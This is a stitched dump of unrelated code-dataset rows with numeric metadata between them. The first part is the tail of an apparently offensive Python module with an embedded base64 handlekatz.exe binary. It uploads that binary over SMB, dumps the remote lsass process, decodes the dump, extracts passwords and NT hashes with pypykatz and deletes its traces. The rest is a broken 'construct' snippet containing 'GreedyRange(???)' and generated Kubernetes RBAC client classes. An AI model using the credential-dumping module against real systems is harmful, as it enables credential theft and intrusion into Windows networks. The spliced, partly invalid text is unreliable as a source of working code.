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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEARQAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQQAAAAAAAkBlAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4BlAAAAAAACwGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
self.handlekatz = "handlekatz.exe"
self.handlekatz_path = "/tmp/shared/"
self.dir_result = self.handlekatz_path
self.useembeded = True
if 'HANDLEKATZ_PATH' in module_options:
self.handlekatz_path = module_options['HANDLEKATZ_PATH']
self.useembeded = False
if 'HANDLEKATZ_EXE_NAME' in module_options:
self.handlekatz = module_options['HANDLEKATZ_EXE_NAME']
self.useembeded = False
if 'TMP_DIR' in module_options:
self.tmp_dir = module_options['TMP_DIR']
if 'DIR_RESULT' in module_options:
self.dir_result = module_options['DIR_RESULT']
def on_admin_login(self, context, connection):
if self.useembeded == True:
with open(self.handlekatz_path + self.handlekatz, 'wb') as handlekatz:
handlekatz.write(self.handlekatz_embeded)
context.log.info('Copy {} to {}'.format(self.handlekatz_path + self.handlekatz, self.tmp_dir))
with open(self.handlekatz_path + self.handlekatz, 'rb') as handlekatz:
try:
connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read)
context.log.success('Created file {} on the \\\\{}{}'.format(self.handlekatz, self.share, self.tmp_share))
except Exception as e:
context.log.error('Error writing file to share {}: {}'.format(share, e))
# get pid lsass
command = 'tasklist /v /fo csv | findstr /i "lsass"'
context.log.info('Getting lsass PID {}'.format(command))
p = connection.execute(command, True)
pid = p.split(',')[1][1:-1]
command = self.tmp_dir + self.handlekatz + ' --pid:' + pid + ' --outfile:' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log'
context.log.info('Executing command {}'.format(command))
p = connection.execute(command, True)
context.log.debug(p)
dump = False
if 'Lsass dump is complete' in p:
context.log.success('Process lsass.exe was successfully dumped')
dump = True
else:
context.log.error('Process lsass.exe error un dump, try with verbose')
if dump:
regex = r"([A-Za-z0-9-]*\.log)"
matches = re.search(regex, str(p), re.MULTILINE)
machine_name = ''
if matches:
machine_name = matches.group()
else:
context.log.info("Error getting the lsass.dmp file name")
sys.exit(1)
context.log.info('Copy {} to host'.format(machine_name))
with open(self.dir_result + machine_name, 'wb+') as dump_file:
try:
connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.dir_result + machine_name))
except Exception as e:
context.log.error('Error while get file: {}'.format(e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz)
context.log.success('Deleted handlekatz file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting handlekatz file on share {}: {}'.format(self.share, e))
try:
connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
except Exception as e:
context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
h_in = open(self.dir_result + machine_name, "rb")
h_out = open(self.dir_result + machine_name + ".decode", "wb")
bytes_in = bytearray(h_in.read())
bytes_in_len = len(bytes_in)
context.log.info("Deobfuscating, this might take a while")
chunks = [bytes_in[i:i+1000000] for i in range(0, len(bytes_in), 1000000)]
for chunk in chunks:
for i in range(0, len(chunk)):
chunk[i] ^= 0x41
h_out.write(bytes(chunk))
with open(self.dir_result + machine_name + ".decode", 'rb') as dump:
try:
credentials = []
credz_bh = []
pypy_parse = pypykatz.parse_minidump_external(dump)
ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds',
'tspkg_creds']
for luid in pypy_parse.logon_sessions:
for ssp in ssps:
for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
domain = getattr(cred, "domainname", None)
username = getattr(cred, "username", None)
password = getattr(cred, "password", None)
NThash = getattr(cred, "NThash", None)
if NThash is not None:
NThash = NThash.hex()
if username and (password or NThash) and "$" not in username:
print_pass = password if password else NThash
context.log.highlight(domain + "\\" + username + ":" + print_pass)
if "." not in domain and domain.upper() in connection.domain.upper():
domain = connection.domain
credz_bh.append({'username': username.upper(), 'domain': domain.upper()})
if len(credz_bh) > 0:
add_user_bh(credz_bh, None, context.log, connection.config)
except Exception as e:
context.log.error('Error openning dump file', str(e)) | 579.461039 | 81,974 | 0.934556 | 2,350 | 89,237 | 35.444255 | 0.639149 | 0.002401 | 0.000972 | 0.001153 | 0.013182 | 0.011141 | 0.010229 | 0.00527 | 0.00407 | 0.003554 | 0 | 0.075929 | 0.027108 | 89,237 | 154 | 81,975 | 579.461039 | 0.88348 | 0.005872 | 0 | 0.135593 | 0 | 0.008475 | 0.936622 | 0.924788 | 0 | 1 | 0.000045 | 0 | 0 | 1 | 0.016949 | false | 0.033898 | 0.050847 | 0 | 0.118644 | 0.016949 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16776719e8b23fe93049dc5c3f51ea965464e240 | 137 | py | Python | compiled/construct/repeat_eos_bit.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 4 | 2017-04-08T12:55:11.000Z | 2020-12-05T21:09:31.000Z | compiled/construct/repeat_eos_bit.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 7 | 2018-04-23T01:30:33.000Z | 2020-10-30T23:56:14.000Z | compiled/construct/repeat_eos_bit.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | [
"MIT"
] | 6 | 2017-04-08T11:41:14.000Z | 2020-10-30T22:47:31.000Z | from construct import *
from construct.lib import *
repeat_eos_bit = Struct(
'nibbles' / GreedyRange(???),
)
_schema = repeat_eos_bit
| 15.222222 | 30 | 0.729927 | 17 | 137 | 5.588235 | 0.647059 | 0.273684 | 0.252632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153285 | 137 | 8 | 31 | 17.125 | 0.818966 | 0 | 0 | 0 | 0 | 0 | 0.051095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
bc5a01a9588ea734436ad2611e5dac2b0ba4835f | 52,244 | py | Python | kuber/v1_18/rbac_v1beta1.py | datalayer-externals/kuber | 4d577950ce7d1be2b882fbe66827dc3d7e67b350 | [
"MIT"
] | 1 | 2019-06-11T04:57:34.000Z | 2019-06-11T04:57:34.000Z | kuber/v1_18/rbac_v1beta1.py | datalayer-externals/kuber | 4d577950ce7d1be2b882fbe66827dc3d7e67b350 | [
"MIT"
] | 1 | 2019-05-05T22:08:13.000Z | 2019-05-06T11:43:32.000Z | kuber/v1_18/rbac_v1beta1.py | datalayer-externals/kuber | 4d577950ce7d1be2b882fbe66827dc3d7e67b350 | [
"MIT"
] | 2 | 2021-05-08T14:47:56.000Z | 2021-10-15T21:47:04.000Z | import typing # noqa: F401
from kubernetes import client # noqa: F401
from kuber import kube_api as _kube_api # noqa: F401
from kuber import definitions as _kuber_definitions # noqa: F401
from kuber import _types # noqa: F401
from kuber.v1_18.meta_v1 import LabelSelector # noqa: F401
from kuber.v1_18.meta_v1 import ListMeta # noqa: F401
from kuber.v1_18.meta_v1 import ObjectMeta # noqa: F401
class AggregationRule(_kuber_definitions.Definition):
"""
AggregationRule describes how to locate ClusterRoles to
aggregate into the ClusterRole
"""
def __init__(
self,
cluster_role_selectors: typing.List["LabelSelector"] = None,
):
"""Create AggregationRule instance."""
super(AggregationRule, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="AggregationRule"
)
self._properties = {
"clusterRoleSelectors": cluster_role_selectors
if cluster_role_selectors is not None
else [],
}
self._types = {
"clusterRoleSelectors": (list, LabelSelector),
}
@property
def cluster_role_selectors(self) -> typing.List["LabelSelector"]:
"""
ClusterRoleSelectors holds a list of selectors which will be
used to find ClusterRoles and create the rules. If any of
the selectors match, then the ClusterRole's permissions will
be added
"""
return typing.cast(
typing.List["LabelSelector"],
self._properties.get("clusterRoleSelectors"),
)
@cluster_role_selectors.setter
def cluster_role_selectors(
self, value: typing.Union[typing.List["LabelSelector"], typing.List[dict]]
):
"""
ClusterRoleSelectors holds a list of selectors which will be
used to find ClusterRoles and create the rules. If any of
the selectors match, then the ClusterRole's permissions will
be added
"""
cleaned: typing.List[LabelSelector] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
LabelSelector,
LabelSelector().from_dict(item),
)
cleaned.append(typing.cast(LabelSelector, item))
self._properties["clusterRoleSelectors"] = cleaned
def __enter__(self) -> "AggregationRule":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRole(_kuber_definitions.Resource):
"""
ClusterRole is a cluster level, logical grouping of
PolicyRules that can be referenced as a unit by a
RoleBinding or ClusterRoleBinding. Deprecated in v1.17 in
favor of rbac.authorization.k8s.io/v1 ClusterRole, and will
no longer be served in v1.20.
"""
def __init__(
self,
aggregation_rule: "AggregationRule" = None,
metadata: "ObjectMeta" = None,
rules: typing.List["PolicyRule"] = None,
):
"""Create ClusterRole instance."""
super(ClusterRole, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRole"
)
self._properties = {
"aggregationRule": aggregation_rule
if aggregation_rule is not None
else AggregationRule(),
"metadata": metadata if metadata is not None else ObjectMeta(),
"rules": rules if rules is not None else [],
}
self._types = {
"aggregationRule": (AggregationRule, None),
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"rules": (list, PolicyRule),
}
@property
def aggregation_rule(self) -> "AggregationRule":
"""
AggregationRule is an optional field that describes how to
build the Rules for this ClusterRole. If AggregationRule is
set, then the Rules are controller managed and direct
changes to Rules will be stomped by the controller.
"""
return typing.cast(
"AggregationRule",
self._properties.get("aggregationRule"),
)
@aggregation_rule.setter
def aggregation_rule(self, value: typing.Union["AggregationRule", dict]):
"""
AggregationRule is an optional field that describes how to
build the Rules for this ClusterRole. If AggregationRule is
set, then the Rules are controller managed and direct
changes to Rules will be stomped by the controller.
"""
if isinstance(value, dict):
value = typing.cast(
AggregationRule,
AggregationRule().from_dict(value),
)
self._properties["aggregationRule"] = value
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def rules(self) -> typing.List["PolicyRule"]:
"""
Rules holds all the PolicyRules for this ClusterRole
"""
return typing.cast(
typing.List["PolicyRule"],
self._properties.get("rules"),
)
@rules.setter
def rules(self, value: typing.Union[typing.List["PolicyRule"], typing.List[dict]]):
"""
Rules holds all the PolicyRules for this ClusterRole
"""
cleaned: typing.List[PolicyRule] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
PolicyRule,
PolicyRule().from_dict(item),
)
cleaned.append(typing.cast(PolicyRule, item))
self._properties["rules"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_cluster_role", "create_cluster_role"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_cluster_role", "replace_cluster_role"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the ClusterRole in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_cluster_role", "patch_cluster_role"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the ClusterRole from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_cluster_role",
"read_cluster_role",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the ClusterRole from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_cluster_role",
"delete_cluster_role",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRole":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRoleBinding(_kuber_definitions.Resource):
"""
ClusterRoleBinding references a ClusterRole, but not contain
it. It can reference a ClusterRole in the global namespace,
and adds who information via Subject. Deprecated in v1.17 in
favor of rbac.authorization.k8s.io/v1 ClusterRoleBinding,
and will no longer be served in v1.20.
"""
def __init__(
self,
metadata: "ObjectMeta" = None,
role_ref: "RoleRef" = None,
subjects: typing.List["Subject"] = None,
):
"""Create ClusterRoleBinding instance."""
super(ClusterRoleBinding, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="ClusterRoleBinding"
)
self._properties = {
"metadata": metadata if metadata is not None else ObjectMeta(),
"roleRef": role_ref if role_ref is not None else RoleRef(),
"subjects": subjects if subjects is not None else [],
}
self._types = {
"apiVersion": (str, None),
"kind": (str, None),
"metadata": (ObjectMeta, None),
"roleRef": (RoleRef, None),
"subjects": (list, Subject),
}
@property
def metadata(self) -> "ObjectMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ObjectMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ObjectMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ObjectMeta,
ObjectMeta().from_dict(value),
)
self._properties["metadata"] = value
@property
def role_ref(self) -> "RoleRef":
"""
RoleRef can only reference a ClusterRole in the global
namespace. If the RoleRef cannot be resolved, the Authorizer
must return an error.
"""
return typing.cast(
"RoleRef",
self._properties.get("roleRef"),
)
@role_ref.setter
def role_ref(self, value: typing.Union["RoleRef", dict]):
"""
RoleRef can only reference a ClusterRole in the global
namespace. If the RoleRef cannot be resolved, the Authorizer
must return an error.
"""
if isinstance(value, dict):
value = typing.cast(
RoleRef,
RoleRef().from_dict(value),
)
self._properties["roleRef"] = value
@property
def subjects(self) -> typing.List["Subject"]:
"""
Subjects holds references to the objects the role applies
to.
"""
return typing.cast(
typing.List["Subject"],
self._properties.get("subjects"),
)
@subjects.setter
def subjects(self, value: typing.Union[typing.List["Subject"], typing.List[dict]]):
"""
Subjects holds references to the objects the role applies
to.
"""
cleaned: typing.List[Subject] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Subject,
Subject().from_dict(item),
)
cleaned.append(typing.cast(Subject, item))
self._properties["subjects"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = [
"create_namespaced_cluster_role_binding",
"create_cluster_role_binding",
]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = [
"replace_namespaced_cluster_role_binding",
"replace_cluster_role_binding",
]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the ClusterRoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_cluster_role_binding", "patch_cluster_role_binding"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the ClusterRoleBinding from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_cluster_role_binding",
"read_cluster_role_binding",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the ClusterRoleBinding from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_cluster_role_binding",
"delete_cluster_role_binding",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "ClusterRoleBinding":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class ClusterRoleBindingList(_kuber_definitions.Collection):
"""
ClusterRoleBindingList is a collection of
ClusterRoleBindings. Deprecated in v1.17 in favor of
rbac.authorization.k8s.io/v1 ClusterRoleBindingList, and
will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["ClusterRoleBinding"] = None,
metadata: "ListMeta" = None,
):
"""Create ClusterRoleBindingList instance."""
super(ClusterRoleBindingList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1",
kind="ClusterRoleBindingList",
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, ClusterRoleBinding),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["ClusterRoleBinding"]:
"""
Items is a list of ClusterRoleBindings
"""
return typing.cast(
typing.List["ClusterRoleBinding"],
self._properties.get("items"),
)
@items.setter
def items(
self, value: typing.Union[typing.List["ClusterRoleBinding"], typing.List[dict]]
):
"""
Items is a list of ClusterRoleBindings
"""
cleaned: typing.List[ClusterRoleBinding] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
ClusterRoleBinding,
ClusterRoleBinding().from_dict(item),
)
cleaned.append(typing.cast(ClusterRoleBinding, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
kwargs["apl_client"] = api_client
